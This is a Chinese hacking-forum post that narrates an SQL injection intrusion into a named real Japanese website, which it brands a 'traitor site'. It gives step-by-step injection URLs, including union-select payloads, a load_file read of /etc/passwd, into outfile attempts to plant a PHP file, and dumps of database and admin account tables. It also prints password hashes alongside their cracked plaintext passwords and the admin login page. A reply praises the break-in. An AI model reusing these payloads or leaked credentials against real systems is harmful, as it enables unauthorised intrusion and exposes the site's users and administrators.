原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

/ Z5 E+ l5 W9 U# x) y8 x8 R; Y
+ w' C6 h( N3 f: ~- j0x01. 检测 www.zuaa.jp 收集数据
# G; \" ?  p, a" m+ z+ `
1 |9 u, o; n" N) ~, r. ^
whatweb
$ n' ^; U! T- l3 Y8 @: c

利用NMAP扫描
) b$ `# T9 O6 F* ~0 u9 {
+ U; M' `$ e2 S0 K5 t8 y& W2 y中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
7 W; u, D: I- q# ~& _- h( \找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
5 h& N* f- \- b7 v- q
* A5 @$ Y/ u! X* t
0x03.order by
2 X% i8 L( |3 e, Z  y! f- m( J) r             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常
3 I; p. r/ l* U& e  i0 U8 J0 {) G
2 @' }3 Y* @# ?0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示
& Y4 B: L& C* q3 q- s$ h! j1 l- z
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

' f- a' @/ O( I% j* U3 u0x05. info:
- v" p% p" A$ T% z  {. }http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
3 U* X: Y) l' R* [database:    openpne
version:      4.1.22
5 n- x- E* Q5 F! o% g5 X! O1 E+ k/ `4 |os:             portbld-freebsd5.4

1 p( G4 C0 |2 p5 b3 p0x06. root用户
: f; P1 Q. K' F5 _4 T% q利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
; N$ z; }, R. @! X  x2 z2 G4 phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

- ?0 i( b+ s- f; O) \5 d通过工具转换
7 A9 M  Q, _9 A5 B
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x07. 利用 into outfile
6 I# u! R# @9 h# e6 @8 L7 ~! {全部都失败
" L, L4 Z  x  u6 Q9 u9 Chttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
% I. M6 S. [9 m" i
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
: c: u! Q4 r5 A
0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
4 r0 h' K: O  f. u  C
8 y; t+ c3 E, b  v: k
* R- L% l! N3 V) }! A% d
. |% S8 ?6 P8 I0 \) M0x09. 查找后台
  y6 y- _0 Q# n$ j3 x0 v利用 现有的各种 后台工具尝试都不行
. q. t2 }# Y4 u4 `( n
0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
4 Y/ s5 a: }# _1 [9 ~可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
: f/ h* B& u' N# W1 d
4 M0 S5 e1 ]$ W. C. \% J这个可以在 www.cmd5.com 解密
7 K. i( q# I$ O. L+ ^4 Mroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
8 K+ N: I& K* T+ g2 O  xchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
. k3 [; V( f% i0 ?, v. y* topenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
+ E" Q" B, u7 I9 N工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

( g, K7 l" z8 v& Q
0 Q1 G: o; _8 [0 z  _$ p0x11. 网站突破
* @2 M% l# z3 I  O3 c* `# b发现网站的源程序 openpne, google 下载 openpne 源码
4 R6 ~" l2 Q  e4 m% B1 J' i
% n0 m$ P/ u4 f' d$ l
) F% M; N5 d% k3 y7 Z! j5 z0x12. 默认信息利用
, _9 [. g- W9 ?http://sns.zuaa.jp/?m=admin&a=page_login
! Q4 _/ A/ a' y
& g' g' a5 h/ L0 y/ q表名 (c_admin_user) ，字段名（username,password）
0 R  t3 v) {1 @% F( V5 phttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

: C8 g/ C$ h6 |8 J& ]- T2 M解密
6 P! h8 s& q- c0 c* L& @$ vzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
0 K; ]5 s: J/ ~" a: K$ ^* z- r
! h7 |! ~# H7 _+ [4 T中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台
4 \8 v1 g$ s" Y; q

' }! m) X) H$ |. D+ ]
0x14. 小结
, z# z& j+ v6 P$ M% M利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
# Y6 ]4 x$ j9 Z------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
. Z$ X5 c/ T# D" _中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
: v7 E/ r0 |* T  X' ]
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
, |- N* U' g. o  k" I7 _7 g) V

荒村狂客

哪个牛人 费的这劲 入侵的